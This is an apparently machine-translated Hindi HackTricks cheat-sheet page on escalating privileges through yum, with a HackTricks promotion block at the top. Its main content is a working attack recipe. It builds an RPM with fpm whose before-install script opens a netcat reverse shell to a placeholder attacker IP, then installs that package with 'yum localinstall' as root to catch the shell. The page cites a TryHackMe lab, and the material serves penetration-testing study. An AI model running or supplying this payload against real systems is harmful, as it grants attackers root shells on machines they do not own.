4.9 KiB
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो करें।
- अपने हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
yum पर और उदाहरण भी देखें।
RPM पैकेज के माध्यम से अनियंत्रित कमांड्स का निष्पादन
पर्यावरण की जाँच
इस वेक्टर का उपयोग करने के लिए उपयोगकर्ता को उच्च विशेषाधिकारी, अर्थात् रूट के रूप में yum कमांड को निष्पादित करने की क्षमता होनी चाहिए।
इस वेक्टर का एक काम करने वाला उदाहरण
इस उत्पाद का एक काम करने वाला उदाहरण daily bugle कमरे में tryhackme पर पाया जा सकता है।
RPM पैकेजिंग
इस खंड में, मैं fpm का उपयोग करके RPM में एक रिवर्स शैल डालने का पैकेजिंग करने का वर्णन करूंगा।
नीचे दिया गया उदाहरण एक पैकेज बनाता है जिसमें एक बीफोर-इंस्टॉल ट्रिगर शामिल है जिसमें एक अनियंत्रित स्क्रिप्ट होता है जो हमलावर द्वारा परिभाषित किया जा सकता है। जब इसे स्थापित किया जाएगा, यह पैकेज अनियंत्रित कमांड को निष्पादित करेगा। मैंने एक सरल रिवर्स नेटकैट शैल उदाहरण का उपयोग डेमोंस्ट्रेशन के लिए किया है, लेकिन यह आवश्यकतानुसार बदला जा सकता है।
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
शैल को पकड़ना
उपरोक्त उदाहरण का उपयोग करते हुए और मानते हुए कि yum
उच्च-अधिकाधिकारी उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।
- रपी एम पी को होस्ट पर स्थानांतरित करें
- अपने स्थानीय होस्ट पर एक सुनने वाला शुरू करें जैसे कि उदाहरण नेटकैट सुनने वाला
- वंशवादी पैकेज
yum localinstall -y exploited-1.0-1.noarch.rpm
को स्थानीय इंस्टॉल करें